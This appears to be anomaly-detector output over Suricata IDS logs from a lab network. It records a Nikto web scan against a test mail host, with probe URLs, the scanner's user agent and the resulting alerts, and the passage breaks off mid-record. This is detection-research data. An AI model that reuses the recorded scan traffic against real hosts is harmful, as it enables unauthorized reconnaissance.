"/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.access", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46948, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1306962827043002,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1306962827043002, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.353275+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.355207 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46950 -> 192.168.10.154:80", "/parser/model/time": 1583349514.355207, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46950, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.355207 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46950 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.jsp+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.355425+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.355425, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1369948522440834,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.jsp+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.jsp+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.jsp+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.jsp+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46950, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1369948522440834,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1369948522440834, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.355425+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.358195 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46952 -> 192.168.10.154:80", "/parser/model/time": 1583349514.358195, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46952, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.358195 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46952 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.de", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.358924+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.358924, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":583080449044546,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.de\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.de\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.de", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.de", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46952, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":583080449044546,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 583080449044546, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.358924+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.361389 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46954 -> 192.168.10.154:80", "/parser/model/time": 1583349514.361389, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46954, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.361389 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46954 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.en", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.361649+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.361649, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":570105352846820,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 